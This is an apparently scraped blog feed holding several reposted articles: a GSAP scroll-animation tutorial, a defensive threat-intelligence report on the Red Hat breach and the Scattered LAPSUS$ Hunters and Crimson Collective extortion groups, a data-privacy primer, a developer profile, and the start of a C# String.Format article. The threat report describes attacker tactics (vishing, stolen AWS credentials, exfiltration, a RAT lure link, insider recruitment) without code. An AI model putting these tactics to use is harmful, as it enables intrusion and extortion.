بلاگ

  • Building a Layered Zoom Scroll Effect with GSAP ScrollSmoother and ScrollTrigger

    Building a Layered Zoom Scroll Effect with GSAP ScrollSmoother and ScrollTrigger



    During my first tutorial, we rebuilt a grid experience from a nice website called Palmer, and I wrote that rebuilding existing interactions from scratch is an incredible way to learn. It trains your eye for detail, helps you grasp the underlying logic, and sharpens your creative problem-solving.

    Today, we’ll work on rebuilding a smooth scrolling animation from the Telescope website, originally created by Louis Paquet, Kim Levan, Adrien Vanderpotte, and Koki-Kiko. The goal, as always, is to understand how this kind of interaction works under the hood and to code the basics from scratch.

    In this tutorial, you’ll learn how to easily create and animate a deconstructed image grid and add a trailing zoom effect on a masked image between split text that moves apart, all based on smooth scrolling. We’ll be doing all this with GSAP, using its ScrollSmoother and ScrollTrigger plugins, which are now freely available to everyone 🎉.

    When developing interactive experiences, it helps to break things down into smaller parts. That way, each piece can be handled step by step without feeling overwhelming.

    Here’s the structure I followed for this effect:

    1. Floating image grid
    2. Main visual and split text
    3. Layered zoom and depth effect

    Let’s get started!


    Free GSAP 3 Express Course


    Learn modern web animation using GSAP 3 with 34 hands-on video lessons and practical projects — perfect for all skill levels.


    Check it out

    Floating image grid

    The Markup

    Before starting the animation, we’ll begin with the basics. The layout might look deconstructed, but it needs to stay simple and predictable. For the structure itself, all we need to do is add a few images.

    <div class="section">
      <div class="section__images">
        <img src="./img-1.webp" alt="Image" />
        <img src="./img-2.webp" alt="Image" />
        <img src="./img-3.webp" alt="Image" />
        <img src="./img-4.webp" alt="Image" />
        <img src="./img-9.webp" alt="Image" />
        <img src="./img-6.webp" alt="Image" />
        <img src="./img-7.webp" alt="Image" />
        <img src="./img-8.webp" alt="Image" />
        <img src="./img-9.webp" alt="Image" />
        <img src="./img-10.webp" alt="Image" />
      </div>
    </div>

    The Style

    .section__images {
      position: absolute;
      top: 0;
      left: 0;
      width: 100vw;
      height: 100vh;
      perspective: 100vh;
    
      img {
        position: absolute;
        width: 10vw;
    
        @media (max-width: 768px) {
          width: 20vw;
        }
    
        &:nth-of-type(1) {
          top: 15vw;
          left: -3vw;
        }
    
        &:nth-of-type(2) {
          top: 5vw;
          left: 20vw;
        }
        
        /* same for all other images */
      }
    }

    When it comes to styling, there are a few important things to note. We set up a full-screen section that contains all the floating images.

    This section uses a perspective value to enable animations along the Z-axis, adding depth to the composition. Inside this section, each image is positioned absolutely to create an organic, scattered arrangement. By assigning their width in viewport units (vw), the images scale proportionally with the browser size, keeping the layout balanced across different screen resolutions.

    The Animation

    First, we’ll use the ScrollSmoother plugin to introduce a subtle scroll inertia, giving the scrolling experience a smoother and more refined feel. We’ll also enable the normalizeScroll option, since we initially ran into some performance inconsistencies that affected the smoothness of the animation.

    const scroller = ScrollSmoother.create({
      wrapper: ".wrapper",
      content: ".content",
      smooth: 1.5,
      effects: true,
      normalizeScroll: true
    })

    A single GSAP timeline is all we need to handle the entire animation. Let’s start by setting it up with the ScrollTrigger plugin.

    this.timeline = gsap.timeline({
      scrollTrigger: {
        trigger: this.dom,
        start: "top top",
        end: "bottom top",
        scrub: true,
        pin: true
      }
    })

    Next, we’ll animate the smaller images by moving them along the Z-axis. To make the motion feel more dynamic, we’ll add a stagger, introducing a small delay between each image so they don’t all animate at the same time.

    this.timeline.to(this.smallImages, {
      z: "100vh",
      duration: 1,
      ease: "power1.inOut",
      stagger: {
        amount: 0.2,
        from: "center"
      }
    })

    Main visual and split text

    Now that we’ve built the floating image grid, it’s time to focus on the centerpiece of the animation — the main image and the text that moves apart to reveal it. This part will bring the composition together and create that smooth, cinematic transition effect.

    <div class="section__media">
      <div class="section__media__back">
        <img src="./img-big.jpg" alt="Image" />
      </div>
    </div>

    Add the large image as a full-size cover using absolute positioning, and define a CSS variable --progress that we’ll use later to control the animation. This variable will make it easier to synchronize the scaling of the image with the motion of the text elements.

    --progress: 0;
    
    .section__media {
      position: absolute;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      z-index: -1;
    
      transform: scale(var(--progress));
    
      img {
          width: 100%;
          height: 100%;
          object-fit: cover;
      }
    }

    For the image animation, we’ll take a slightly different approach. Instead of animating the scale property directly with GSAP, we’ll animate a CSS variable called --progress throughout the timeline. This method keeps the code cleaner and allows for smoother synchronization with other visual elements, such as text or overlay effects.

    onUpdate: (self) => {
      const easedProgress = gsap.parseEase("power1.inOut")(self.progress)
      this.dom.style.setProperty("--progress", easedProgress)
    }

    Animating a CSS variable like this gives you more flexibility, since the same variable can influence multiple properties at once. It’s a great technique for keeping complex animations both efficient and easy to tweak later.

    Next, we’ll add our text element, which is divided into two parts: one sliding to the left and the other moving to the right.

    <h1>
      <span class="left">for the</span>
      <span class="right">planet</span>
    </h1>

    Now we just need to use the --progress variable in our CSS to animate the two text parts on each side of the image. As the variable updates, both text elements will move apart in sync with the image scaling, creating a smooth and coordinated reveal effect.

    .left {
      transform: translate3d(calc(var(--progress) * (-66vw + 100%) - 0.5vw), 0, 0);
    }
    
    .right {
      transform: translate3d(calc(var(--progress) * (66vw - 100%)), 0, 0);
    }

    With this CSS in place, both halves of the text slide away from the center as the scroll progresses, perfectly matching the scaling of the image behind them. The result is a smooth, synchronized motion that feels natural and balanced, reinforcing the sense of depth and focus in the composition.

    Layered zoom and depth effect

    This effect feels fresh and cleverly designed, creating that nice “wow” moment without being overly complex to build. We’ll start by adding the “front” images to our structure, which are simple duplicates of the background image. These layers will help us create a trailing zoom effect that adds depth and motion to the final scene.

    <div class="section__media__front front-1">
      <img src="./img-big.jpg" alt="Image" />
    </div>
    <div class="section__media__front front-2">
      <img src="./img-big.jpg" alt="Image" />
    </div>
    <div class="section__media__front front-3">
      <img src="./img-big.jpg" alt="Image" />
    </div>
    <div class="section__media__front front-4">
      <img src="./img-big.jpg" alt="Image" />
    </div>
    <div class="section__media__front front-5">
      <img src="./img-big.jpg" alt="Image" />
    </div>
    <div class="section__media__front front-6">
      <img src="./img-big.jpg" alt="Image" />
    </div>

    Next, we’ll create and add a mask of the main subject (in this case, a crab) to make it appear as if it’s popping out from the background. This mask will define the visible area of each front image, giving the illusion of depth and motion as the layers scale and blur during the animation.

    .section__media__front {          
      img {
        mask-image: url(./mask.png);
        mask-position: 50% 50%;
        mask-size: cover;
      }
    }

    Here we’re scaling each image layer progressively to create a sense of depth.
    The first element stays at its original size, while each following layer is slightly smaller to give the impression that they’re moving further into the background.

    .front-1 {
      transform: scale(1);
    }
    
    .front-2 {
      transform: scale(0.85);
    }
    
    .front-3 {
      transform: scale(0.6);
    }
    
    .front-4 {
      transform: scale(0.45);
    }
    
    .front-5 {
      transform: scale(0.3);
    }
    
    .front-6 {
      transform: scale(0.15);
    }

    And finally, we just need to add one more step to our timeline to bring all the image layers back to their original scale (scale: 1). This final motion completes the trailing effect and smoothly transitions the focus toward the main visual. The scaling animation also helps tie the layered depth back together, making the composition feel cohesive and polished.

    this.timeline.to(this.frontImages, {
      scale: 1,
      duration: 1,
      ease: "power1.inOut",
      delay: .1,
    }, 0.4)

    To make the effect even more refined, we can add a subtle blur to each layer at the start and then animate it away as the timeline plays. This creates a soft, atmospheric look that enhances the perception of motion and depth. As the blur fades, the scene gradually becomes sharper, drawing the viewer’s attention toward the subject in a natural, cinematic way.

    .section__media__front {   
      filter: blur(2px);
    }
    this.timeline.to(this.frontImages, {
      duration: 1,
      filter: "blur(0px)",
      ease: "power1.inOut",
      delay: .4,
      stagger: {
        amount: 0.2,
        from: "end"
      }
    }, 0.6)

    With the scaling and blur animations combined, the layered zoom effect feels rich and immersive. Each layer moves in harmony, giving the animation depth and fluidity while keeping the overall experience smooth and visually balanced.

    The result

    Here’s the final result in action. The combination of scaling, blur, and smooth scrolling creates a clean, layered motion that feels both natural and visually engaging. The subtle depth shift gives the impression of a 3D scene coming to life as you scroll, all built with just a few well-timed animations.

    Final thoughts

    I hope you’ve learned a few new things and picked up some useful tricks while following this tutorial. I’m always amazed by how powerful the GSAP library is and how it allows us to create advanced, polished animations with just a few lines of code.

    I highly recommend checking out the full Telescope website, which is truly a masterpiece filled with creative and inspiring effects that showcase what’s possible with thoughtful interaction design.

    Thanks for reading, and see you around 👋



    Source link

  • Anatomy of the Red Hat Intrusion: Crimson Collective and SLSH Extortions

    Anatomy of the Red Hat Intrusion: Crimson Collective and SLSH Extortions


    Introduction

    In August 2025, a Telegram channel named “Scattered LAPSUS$ Hunters” surfaced, linking itself to notorious cybercrime groups: Scattered Spider, ShinyHunters, and LAPSUS$. The group quickly began posting stolen data, ransom demands, and provocative statements, reviving chaos once driven by LAPSUS$.  Its name hints at connections to “The Com”, an underground network where actors often share tools and identities, making attribution complex. As covered in our earlier blog on the Google-Salesforce breach, such overlaps are common among clusters like UNC3944 (Scattered Spider), UNC5537 and UNC6040.

    Overview of the larger collective – Attack Flow Diagram

     

    The Scattered LAPSUS$ Shiny Hunters (SLSH) group reportedly shared exploit code for CVE-2025-61882, a critical zero-day flaw in Oracle’s E-Business Suite that allows unauthenticated remote code execution. Oracle confirmed the issue and released an emergency patch after Mandiant revealed that the Clop ransomware group had exploited the flaw in August 2025 to steal data and conduct ransom campaigns. In September, hackers linked to SLSH breached a third-party provider for Discord, exposing limited user data, including payment details and IDs, and demanded ransom to prevent leaks. Evidence suggested access to Discord’s admin systems via a Zendesk compromise. Researchers believe ShinyHunters operates an Extortion-as-a-Service (EaaS) model, partnering with other hackers for ransom operations, an idea reinforced by other breaches. On October 11, SLSH announced plans to publicly launch its EaaS platform.

    Threat Landscape

    Recent posts threaten to leak Salesforce-related data if ransoms are unpaid by October 10 and hint at further attacks linked to the Salesloft ecosystem. Investigations indicate that the group relies heavily on vishing-based social engineering, convincing employees to install fake Salesforce Data Loader apps or approve malicious connected apps to gain access. These incidents underscore that the real weakness lies not in software flaws but in human manipulation, a persistent hallmark of this evolving threat landscape. Salesforce has publicly stated it will not comply with ransom demands made by the Scattered LAPSUS$ Hunters (SLH) group.

    Shortly after this stance became public, a malware-laced message titled “Shiny hunters” was sent to KrebsOnSecurity, containing physical threats and a malicious link hosted on limewire[.]com. Similar threatening emails targeted Mandiant and several other security firms.

    Email sent by ShinyHunters

     

    The link masqueraded as a screenshot file that secretly dropped a Remote Access Trojan (RAT), capable of surveillance, credential theft, and keylogging, without the victim opening the file. Mandiant later identified the malware as AsyncRAT, a .NET-based RAT widely used in cybercrime operations. Its plugin-based design allows attackers to quietly run malicious tools, capture screenshots, log keystrokes, and mine cryptocurrency.

    AsyncRAT Sample

     

    Such intimidation tactics are consistent with past SLH behavior, where members targeted researchers and law enforcement investigating their campaigns. Meanwhile, law enforcement pressure is mounting. In late September, two suspected Scattered Spider members were arrested in the UK for stealing and extorting over $115 million through similar operations.

    Despite multiple arrests over the years, these groups or their rebrands remain active and increasingly bold. They claim to operate a new ransomware service, “SHINYSP1D3R” , and sell exploits, though most of these claims remain unverified. Many alleged victims match past UNC5537 and UNC6040 targets, suggesting continuity rather than a new actor.

    Oracle Zero-Day Exploitation

    The Scattered LAPSUS$ Shiny Hunters (SLSH) group also appears to have shared exploit code CVE-2025-61882, a critical zero-day in Oracle’s E-Business Suite, allowing unauthenticated remote code execution i.e., it may be exploited over a network without the need for a username and password.

    Oracle has verified and issued an emergency patch, urging customers to update immediately. Mandiant’s Charles Carmichael confirmed that the Clop ransomware group first exploited this flaw in August 2025 to steal data from Oracle servers and initiate ransom campaigns.

    Exploit activity targeting Oracle EBS servers was observed as early as July 2025, prior to the release of official patches. Some of the exploit artifacts reportedly overlap with an exploit shared in the SLSH Telegram channel on October 3, 2025. However, GTIG (Google Threat Intelligence Group) notes that there is insufficient evidence to conclusively attribute the core intrusion to SLH or “Shiny Hunters” (UNC6240).

    Red Hat and Discord Breach

    On September 20, hackers breached a third-party support provider used by Discord, stealing user identities, payment info, and government-issued IDs from a limited number of users who interacted with customer support or Trust & Safety.

    The attackers allegedly tied to the Scattered LAPSUS$ Hunters (SLH) — demanded a ransom to prevent data leaks. Leaked images showed access lists connected to Discord’s admin systems, reportedly tied to a Zendesk compromise.

    While Discord took immediate action, the full impact remains unclear, and the name of the vendor hasn’t been officially disclosed. Exposed data includes names, emails, billing info, IPs, and even passport/driver’s license photos.

    Security experts warn this leak could be a goldmine for tracing crypto scams, with Hudson Rock’s CTO noting: “This database could help solve major fraud cases.”

    Discord stated that only around 70,000 government ID photos may have been exposed; rather than the 2.1 million that hackers claim. They also stated that Discord itself wasn’t breached, and that regardless of what the hackers claim, it won’t be paying out any ransom demands.

    Over recent weeks, a new threat group calling itself Crimson Collective has been observed targeting AWS cloud environments to steal sensitive data and extort victims — including a recent claim of breaching Red Hat’s private GitLab repositories. The group alleges it stole around 570 GB of data from nearly 28,000 internal repositories and approximately 800 Consulting Engagement Reports (CERs) as part of the attack. To support their claims, Crimson Collective shared a sample of the stolen data — including a tree structure of the compromised repositories — via their Telegram channel.


    First seen in September 2025 by Rapid7, the group uses TruffleHog, an open-source tool, to scan for leaked AWS credentials. Once access is gained, they create new users, escalate privileges, and exfiltrate databases, project repos, and EBS snapshots using native AWS services like S3 and RDS.
    They often deploy custom EC2 instances with permissive security groups, attach stolen volumes, and use Simple Email Service (SES) or external accounts to send extortion emails to victims. The group’s tactics show careful planning, high automation, and a focus on cloud-native abuse — all while leveraging valid credentials, not exploits.
    Although their exact structure remains unclear, the use of shared IPs and language in ransom notes suggests multiple actors are involved. Their focus appears to be data theft over encryption, aligning them more with modern extortion-as-a-service operations.
    (Source: Rapid7, Extortion note sent to the victim)

    There is growing speculation that the Red Hat compromise may be linked to a recently disclosed vulnerability in Red Hat OpenShift AICVE-2025-10725 (CVSS 9.9). While no official attribution has been made, but we observed that the sample data leaked by Scattered LAPSUS$ Shiny Hunters (SLSH) contained .config and .yml files referencing internal infrastructure details. This suggests that Crimson Collective may have exploited the vulnerability as part of their access or escalation strategy within the compromised environment. According to Red Hat, the flaw requires minimal authentication and allows a low-privileged user to escalate privileges and gain cluster administrator access, potentially compromising all workloads and data within the hybrid cloud environment.

    Compromised data pointing to Red Hat OpenShift

    This serious vulnerability threatens the confidentiality, integrity, and availability of the entire AI platform. OpenShift AI, Red Hat’s enterprise-grade solution for managing AI/ML workloads at scale, is widely used across industries and integrates tools like Jupyter notebooks, making the impact of such a flaw potentially far-reaching.

    IP addresses linked to this activity by Rapid7 were primarily used for port-scanning activity. Targeted ports are 9, 21, 80, 81, 82, 443, 3000, 3001, 4443, 5000, 5001, 7001, 8000, 8008, 8010, 8080, 8081, 8082, 8443, 8888, 9000, 9001, 9090, 9091, 9099. Activity for these IPs was observed between 8th and 20th September.

    Later, researchers observed that Scattered Lapsus$ Shiny Hunters (SLSH) listed Red Hat on their leak site — indicating that SLSH is extorting Red Hat on behalf of Crimson Collective. Analysts now believe the Red Hat data breach is likely a collaborative operation between SLSH and Crimson Collective.

    (Source: Scattered Lapsus$ Hunters leak site)

    An analysis of the file tree and data samples shared by Crimson Collective—and later referenced on the Scattered LAPSUS$ Hunters leak site—indicates that numerous organizations may be impacted by the Red Hat breach. The names of companies and environments included in the leaked repository structure suggest a wide operational footprint. While the actual file contents remain inaccessible, the naming conventions and structure provide insight into the possible reach of the compromise. Some of the sample CER dataset shared in the leak site revealed example configuration scripts (.cfg, .yml), example authentication tokens, sample network diagrams and default passwords. Even when labelled “examples”, these files could pose risk to customers (who appear in those CER files) if they come directly from production-like engagements.

    It’s important to note that the following statistical chart is based solely on directory tree and file names, which we observed in their leaked sample data structure. Since the underlying files or data were not accessible, we cannot say with complete certainty that all entries reflect active or legitimate systems, some entries may reflect outdated systems, internal testing, or incomplete deployments. However, the extensive listing—covering nearly five years of consulting activities—strongly suggests that a significant portion of this information may relate to real, deployed production environments across the listed organizations.

    Analysis based on the Red Hat leaked directory tree shows that BFSI happens to be the most affected sector (~29%), followed by technology (~17%) and government (~11%) sectors globally.

    For months, security researchers have suspected ShinyHunters of operating as an Extortion-as-a-Service (EaaS) group—partnering with other threat actors to extort victims and taking a cut of the ransom, much like a ransomware affiliate model. This theory gained traction after multiple breaches, including those at Oracle Cloud and PowerSchool, were extorted under the ShinyHunters name, despite the group not directly claiming the intrusions.

    In conversations with BleepingComputer, ShinyHunters admitted they often act as brokers for stolen data, typically receiving 25–30% of any extortion payment. With the launch of their public data leak site, they now appear to be offering this service openly.

    In addition to Red Hat, ShinyHunters is currently extorting S&P Global on behalf of another threat actor, who claimed responsibility for a February 2025 breach. While S&P previously denied any compromise, ShinyHunters has now released sample data and set an October 10 ransom deadline. When asked for comment, S&P Global declined, citing disclosure obligations as a U.S.-listed company.

    The Scattered LAPSUS$ Shiny Hunters posted an open recruitment message on their Telegram channel seeking insider access from employees at high‑revenue organizations — explicitly targeting sectors such as telecommunications (Claro, Telefónica, AT&T, etc.), large software and gaming firms (Microsoft, Apple, EA, IBM, etc.), call center/BPM providers (Atento, Teleperformance, etc.), and server hosts (OVH, Locaweb, etc.). The post makes clear they’re not after data (they claim to “have it all already”) but want persistent network entry — VPN/VDI/Citrix access, Active Directory capabilities, Okta/Azure/AWS privileged access — and offer payment for willing insiders. They encouraged uncertain candidates to DM them, said non‑employees with VPN/VDI access are also of interest, and noted a primary focus on targets in the US, AU, UK, CA, and FR. This brazen solicitation underlines their shift toward insider‑enabled intrusions to support extortion operations.


    As of October 8, SLSH Group posted in their Telegram channel that they have in possession a large KYC dataset pertaining to Indian citizen. There was no further evidence shared and hence the authenticity of this claim remains uncertain at the time of writing this report.
    On October 11, Scattered LAPSUS$ Shiny Hunters (SLSH) disclosed intentions to launch a public EaaS offering. According to their statement, a portal and accompanying instructions will be made available. SLSH says the main advantage is that attackers can leverage the group’s name and reputation to increase effectiveness compared with anonymous attempts. Further information is expected. And they published the full leaked datasets of “Qantas Airways Limited”, “Albertsons Companies, Inc.”, “GAP INC.”, “Fujifilm”, “Engie Resources” and “Vietnam Airlines” on their darknet site, likely after negotiations broke down or ransom demands were rejected.

     

     

     

    Contextualization

    Seqrite Threat Intelligence (STI) offers complete correlation related to these groups along with proper enrichment and context on victimology, TTPs, vulnerabilities and more:

    Conclusion

    The rise of Scattered LAPSUS$ Hunters marks a new phase in cyber extortion, one driven by publicity, social engineering, and collaboration rather than pure technical skill. Their blending of tactics from LAPSUS$, ShinyHunters, and Scattered Spider reflects a broader shift toward loosely connected extortion alliances that thrive on chaos and visibility.

    The use of leaked exploits like the Oracle E-Business Suite zero-day shows how quickly threat actors can weaponize public tools to amplify impact. Attribution remains blurred as groups share infrastructure and code across open platforms. This campaign reinforces that people, not just systems, are the weakest link. The best defense now lies in strong access controls, multi-factor authentication, continuous threat monitoring, and user awareness. These hybrid attacks prove that modern cybercrime is as much about psychological pressure and reputation damage as it is about technical compromise.

    • Rotate all credentials and service accounts across Oracle, Discord, and third-party systems and follow Red Hat guidelines issued in the advisory.
    • Patch all systems immediately and isolate any unpatched servers.
    • Revoke and regenerate default auth tokens, API keys, session cookies, digital certificates (CER files) and private keys.
    • Audit and clean all configuration files to remove hardcoded credentials or tokens.
    • Implement continuous secret scanning in code and config repositories.
    • Restrict admin and service access using least-privilege and just-in-time models.
    • Enhance SIEM and EDR/XDR monitoring to detect credential or token misuse.
    • Assess and secure third-party vendors; require SOC 2 or ISO 27001 compliance.
    • Conduct a full data exposure analysis to confirm scope and impact of leaked data.
    • Rebuild or restore compromised systems from clean backups if integrity is uncertain.
    • Update the incident response plan to include leaked config, token, and certificate scenarios.
    • Notify affected users or partners and comply with disclosure regulations.
    • Enable continuous vulnerability scanning and scheduled credential/key rotation.
    • Monitor dark web sources for leaked configs, tokens, or certificates.
    • Train employees to recognize phishing, credential theft attempts and how not to fall into the vishing trap.



    Source link

  • Building Trust with Data: Data Privacy Basics for Business Leaders

    Building Trust with Data: Data Privacy Basics for Business Leaders


    Introduction

    In today’s digital-first economy, data has become the backbone of every business operation—from customer onboarding and marketing to employee management and vendor coordination. Every digital interaction generates data. But with this opportunity comes responsibility: how that data is collected, processed, and protected.

    For business leaders, especially in India, data privacy has moved from a compliance checkbox to a core business priority. The Digital Personal Data Protection (DPDP) Act, 2023, has made it mandatory for organisations to handle personal data responsibly—or face severe financial and reputational consequences.

    Consumers are also paying attention. Studies reveal that over 80% of Indian customers choose brands based on how well their personal data is protected. In other words, compliance builds trust, and trust builds business.

    Let’s explore data privacy fundamentals and why every leader needs to make it part of their business DNA.

    What is Data Privacy?

    Data privacy refers to the responsible collection, storage, and use of personal information in a way that respects an individual’s rights and choices. Personal data includes any information that can identify a person—such as name, phone number, Aadhaar or PAN, email address, health records, location, or behavioural insights like purchase patterns.

    Data privacy is about transparency and control—ensuring individuals know how their data is used and allowing them to manage or withdraw consent.

    When mishandled, data can become a liability. In 2024, the average cost of a data breach in India touched ₹19.5 crore, with phishing and stolen credentials emerging as leading causes. Beyond financial losses, such incidents can permanently erode customer confidence.

    Why is Data Privacy Important?

    1. Protecting individual rights

    Every person has the right to safeguard their personal information. Data exposure can lead to fraud, identity theft, and reputational harm. Ensuring privacy protection upholds ethical business standards and strengthens consumer confidence.

    1. Building customer trust

    Trust is the new currency in digital business. Customers prefer companies that demonstrate accountability and transparency in data handling.
    In India, 82% of customers associate strong data protection with brand trust, even though 76% remain concerned about privacy on social platforms. This disconnect represents an opportunity for organisations to differentiate themselves by prioritising privacy as part of their value proposition.

    1. Ensuring regulatory compliance

    The DPDP Act, 2023 has set a new benchmark for data governance in India. Non-compliance can lead to penalties of up to ₹250 crore. Adhering to privacy principles reduces legal risk and strengthens your organisation’s reputation as a responsible data custodian.

    Understanding the DPDP Act

    The Digital Personal Data Protection (DPDP) Act, 2023 establishes clear rules for how organisations collect, store, and process personal data in India. It applies to any entity offering goods or services to individuals in India, even if the processing occurs outside the country.

    Key provisions for business leaders include:

    • Informed Consent: Data must be collected only after obtaining precise, specific, and informed consent from the individual, with the option to withdraw it easily.
    • Transparent Notices: Businesses must provide concise, accessible privacy notices explaining what data is being collected, for what purpose, and how users can exercise their rights.
    • Data Principal Rights: Individuals can access, correct, delete, and raise grievances related to their data.
    • Accountability Measures: Organisations must implement technical and organisational safeguards and report data breaches to the Data Protection Board of India (DPBI) and affected individuals when required.

    Key Terms to Know:

    • Data Principal: The individual whose data is collected (customer, employee, etc.)
    • Data Fiduciary: The organisation that determines how personal data is processed
    • Consent: Freely given, informed permission from the Data Principal
    • Data Principal Rights: Rights to know, correct, erase, and raise complaints about data handling

    Why Business Leaders Should Care

    Every business—large or small—handles personal data. Whether it’s customer information, employee records, or vendor details, the onus of protecting that data lies with leadership.

    Failure to comply with privacy requirements can lead to:

    • Regulatory penalties and legal action
    • Loss of customer trust and brand credibility
    • Operational disruptions and financial impact from breaches

    Data privacy is not just an IT or legal issue—it’s a strategic leadership priority.

    Common Data Privacy Pitfalls

    Many Indian organisations are still evolving in terms of their privacy maturity. Common errors include:

    • Collecting unnecessary personal data
    • Failing to obtain valid, informed consent
    • Storing data without encryption or access controls
    • Sharing information with third parties without authorisation
    • Neglecting employee data protection

    Even small oversights can have large consequences. Proactively addressing these helps businesses avoid compliance risks and build stronger governance frameworks.

    How Businesses Can Strengthen Data Privacy

    Here’s a practical roadmap to embed privacy into your business operations:

    1. Map your data ecosystem
      Identify what personal data your organisation collects, where it’s stored, and who accesses it.
    2. Simplify consent management
      Ensure consent forms are precise, user-friendly, and compliant with DPDP requirements.
    3. Secure your data
      Apply encryption, multi-factor authentication, and strict access controls to protect sensitive data.
    4. Enforce access governance
      Limit data access to authorised personnel based on defined roles and responsibilities.
    5. Educate your workforce
      Conduct regular privacy and cybersecurity training to create a culture of accountability.
    6. Establish a transparent privacy policy
      Clearly communicate how data is collected, processed, and protected—and how users can exercise their rights.

    Conclusion

    In the digital economy, trust is a strategic differentiator. Data privacy is no longer just a compliance requirement—it’s an enabler of business resilience and customer loyalty.

    By embedding privacy into your business processes, you demonstrate respect for your stakeholders and align with global standards of responsible governance.

    If you’re beginning your data privacy journey, Seqrite Data Privacy offers a comprehensive, enterprise-grade platform designed for Indian businesses. It enables you to:

    • Discover and classify personal data across your organisation
    • Manage Data Principal Rights requests with ease
    • Automate compliance with DPDP, GDPR, HIPAA, and other global frameworks
    • Gain transparency with dashboards and role-based access controls

    With Seqrite Data Privacy, you build compliance into the core of your operations—strengthening trust, reducing risk, and positioning your business for long-term success.

    Build trust. Ensure compliance. Protect your business—with Seqrite.



    Source link

  • The Art of Play: Karim Maaloul’s World of Interactive Wonder

    The Art of Play: Karim Maaloul’s World of Interactive Wonder


    Karim Maaloul, Developer spotlight

    Hi, I’m Karim, co-founder and Creative Director at EPIC Agency. I lead a team of talented designers and collaborate closely with skilled developers at EPIC to craft nice looking and user friendly websites.

    I’m closely involved in UX/UI design, from early prototyping to the design of full digital platforms.
    I also dedicate much of my time to crafting game concepts and 3D models for activation games and immersive experiences.

    By night, you’ll often find me coding games or experimenting with shaders, still chasing that spark of play and creativity that started it all.


    Free GSAP 3 Express Course


    Learn modern web animation using GSAP 3 with 34 hands-on video lessons and practical projects — perfect for all skill levels.


    Enroll Free

    Highlighted projects

    The Cursed Library

    The Cursed Library is a passion project that blends my lifelong love for children’s books, classic tales, and dark, immersive atmospheres. I designed six unsettling worlds inspired by well-known stories, modeled entirely in Blender 3D.

    Powered by Three.js and custom shaders, the experience unfolds as a journey through a haunted library, where hidden portals transport visitors into different dimensions.

    Sound is at the heart of the experience. Every whisper, melody, and echo shapes the mood. The amazing Steve Jones and Jules Maxwell crafted the haunting soundtracks, recorded the voices, and coded the intricate audio transitions.

    Captain Goosebumps

    Every year at EPIC, we dedicate our time and expertise to support a cause that reflects our values. This year, we chose to raise awareness for Live in Color, a Belgian organization that promotes the inclusion of refugees through education.

    To do so, we created a playful web game featuring a skiing goose that brings color back to the world. While the core development was led by my colleague Théo Gil Cerqueira, I was responsible for the art direction, illustration, and shader coding of the trail.

    Red Bull Sand Scramble

    Red Bull is a client we collaborate with regularly. I’ve been involved in several game projects for them, but my favorite is Red Bull Sand Scramble, a fast-paced racing game where I developed a simple yet efficient physics engine, along with the 3D modeling and gameplay design.

    I worked closely with Shamil Altamirov who developed the interface, and my associate Thierry Michel, who coded the whole gameplay and transformed a rough prototype into an energetic, adrenaline-filled experience that perfectly captures the spirit of Red Bull.

    Tiny Experiments

    I’ve always had a soft spot for small-scale projects. I enjoy crafting bite-sized experiences that explore simple mechanics and techniques in playful ways. I spend a lot of time experimenting on CodePen, where I can focus on the tiny details and polish every interaction.

    Here are a few of those experiments.

    See the Pen
    Skating bunny by Karim Maaloul (@Yakudoo)
    on CodePen.

    Skating Bunny is a small minimalist game I built as a playful reward for people who contact us through our website. It was a perfect excuse to experiment with the frame buffer technique used to draw the skate marks and to craft custom shaders for the smooth, blurred floor reflections.

    See the Pen
    Infinite Portals by Karim Maaloul (@Yakudoo)
    on CodePen.

    Two worlds are interconnected, sharing the same camera view but existing in different spatial dimensions. This experiment is another take on the portal effects I previously explored in The Cursed Library.

    See the Pen
    Chill the lion by Karim Maaloul (@Yakudoo)
    on CodePen.

    Chill the Lion was the Codepen that got me the most attention, I made it during a heat wave, and somehow, it went viral.

    It was also one of my very first experiments with Three.js, where I built a lion entirely out of cube primitives.

    Back then, I had no 3D modeling experience at all. Learning Blender 3D later on completely transformed how I design and bring interactive characters to life.

    About me

    I began my career nearly two decades ago as a children’s book illustrator before transitioning into web design. I then joined several agencies as a Flash developer, creating rich interactive experiences. When Flash met its end, I dove into Three.js, exploring new ways to bring interactivity to the web through 3D experiences and games.

    What I love most is blending my illustration, design, and coding skills to craft short, playful experiences.
    I enjoy infusing my own art direction into the code and constantly learning new techniques to better express my creative vision.

    These days, I’m most excited about Godot, an open-source, lightweight alternative to the big game engines.
    I’m also curious to see how AI will shape and expand the creative process.
    And of course, I’m still interested in Three.js, especially TSL, a node-based shading language that simplifies the creation of shaders.

    Karim and Wenzhu at work
    This is me, pretending to work very hard with my colleague Wenzhu.

    Tools

    I use Blender3D, Figma, Photoshop, and After Effects daily to shape the design of my experiences. On the coding side, I rely on Three.js, GSAP, and vanilla JavaScript to bring my characters to life.

    Lately, with the rise of AI, I’ve been experimenting with ComfyUI, Midjourney, and VEO3.

    Final Thoughts

    In the end, tools are just tools.
    I once saw a calligrapher write a stunningly beautiful word using only his finger and some coffee as ink. A perfect reminder that the greatest skill one can develop is a sharp eye and a rich, open-minded sense of curiosity.

    Codrops illustrates this idea by showing that there’s never a single way to achieve an effect.
    Mastering a technique broadens your skill set, but what truly matters is the ability to forge your own path.

    Thank you for reading this spotlight!



    Source link

  • How to use String.Format – and why you should care about it | Code4IT


    Is string.Format obsolete? Not at all, it still has cards to play! Let’s see how we can customize format and create custom formatters.

    Table of Contents

    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    Formatting strings is one of the basic operations we do in our day-by-day job. Many times we create methods to provide specific formatting for our data, but not always we want to implement additional methods for every type of formatting we need – too many similar methods will clutter our code.

    Let’s say that you have this simple class:

    class CapturedPokemon{
      public string Name { get; set; }
      public int PokedexIndex { get; set; }
      public decimal Weight { get; set; }
      public decimal Height { get; set; }
      public DateTime CaptureDate { get; set; }
    }
    

    and an instance of that class:

    var pkm = new CapturedPokemon
    {
        Name = "Garchomp",
        PokedexIndex = 445,
        Height = 1.9m,
        Weight = 95.0m,
        CaptureDate = new DateTime(2020, 5, 6, 14, 55, 23)
    };
    

    How can we format the pkm variable to provide useful information on our UI?

    The most simple ways are using concatenation, formatting, or string interpolation.

    Differences between concatenation, formatting, and interpolation

    Concatenation is the simplest way: you concatenate strings with the + operator.

